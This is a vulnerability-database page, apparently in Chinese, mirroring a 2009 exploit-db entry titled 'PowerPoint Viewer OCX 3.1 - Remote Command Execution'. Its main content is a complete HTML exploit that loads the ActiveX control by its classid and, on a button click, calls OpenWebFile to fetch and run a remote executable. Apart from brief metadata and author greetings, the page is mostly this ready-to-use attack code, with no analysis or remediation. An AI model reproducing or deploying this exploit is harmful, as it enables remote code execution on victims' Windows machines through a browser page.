PowerPoint Viewer OCX 3.1 - Remote Command Execution

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057280 漏洞类型
发布时间 2009-01-13 更新时间 2009-01-13
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7755
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
PowerPoint Viewer OCX v3.1 Remote File Execution Exploit

Founded By : Cyber-Zone
E-mail     : Paradis_des_fous@hotmail.fr
Home       : WwW.Exploiter5.CoM
GreetZ     : Houssamix , Hussin X , JiKo , StaCk , str0ke , The_5p3ctrum



<HTML>
<BODY>
 <object id=Cyb classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F22B92}"></object>

<SCRIPT>

function Do_it()
 {
   File = "http://test.com/file.exe"
   Cyb.OpenWebFile(File)
 }


</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="exploit">

</body>
</HTML>

# milw0rm.com [2009-01-13]